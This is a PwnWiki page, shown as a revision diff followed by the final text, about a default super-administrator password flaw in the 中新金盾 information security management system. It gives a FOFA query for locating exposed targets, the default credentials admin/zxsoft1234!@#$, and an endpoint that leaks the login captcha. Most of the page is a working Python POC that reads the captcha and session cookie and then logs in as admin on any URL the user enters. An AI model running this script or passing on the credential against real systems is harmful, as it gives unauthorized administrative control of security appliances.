Difference between revisions of "中新金盾信息安全管理系統 默認超級管理員密碼漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> 中新金盾信息安全管理系统 </pre> ==FOFA== <pre> title="中新金盾信息安全管理系统" </pre...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 15: | Line 15: | ||
<translate> | <translate> | ||
| − | ==默認帳號密碼== | + | ==默認帳號密碼== <!--T:2--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 23: | Line 23: | ||
<translate> | <translate> | ||
| − | ==驗證碼== | + | ==驗證碼== <!--T:3--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
請求 | 請求 | ||
</translate> | </translate> | ||
| Line 33: | Line 34: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
返回了驗證碼。 | 返回了驗證碼。 | ||
</translate> | </translate> | ||
| Line 100: | Line 102: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:6--> |
</translate> | </translate> | ||
https://mp.weixin.qq.com/s/DWuUlbtFU-MiGE3zw1w8Yg | https://mp.weixin.qq.com/s/DWuUlbtFU-MiGE3zw1w8Yg | ||
Latest revision as of 09:16, 31 March 2021
漏洞影響
中新金盾信息安全管理系统
FOFA
title="中新金盾信息安全管理系统"
默認帳號密碼
admin/zxsoft1234!@#$
驗證碼
請求
?q=common/getcode
返回了驗證碼。
POC
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 中新金盾信息安全管理系统 默认超级管理员密码漏洞 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "?q=common/getcode"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在获取验证码 {}?q=common/getcode ..... \033[0m".format(target_url))
response_data = response.headers['Set-Cookie']
check_code = re.findall(r'check_code=(.*?);', response_data)[0]
PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]
print("\033[36m[o] 验证码:{}\n[o] PHPSESSID:{} \033[0m".format(check_code, PHPSESSID))
POC_2(target_url, check_code, PHPSESSID)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, check_code, PHPSESSID):
vuln_url = target_url + "?q=common/login"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie":"PHPSESSID={}; check_code={}".format(PHPSESSID, check_code),
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}
data = "name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1".format(check_code)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)
if "1" in response.text and response.status_code == 200:
print("\033[36m[o] 目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在默认管理员弱口令 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
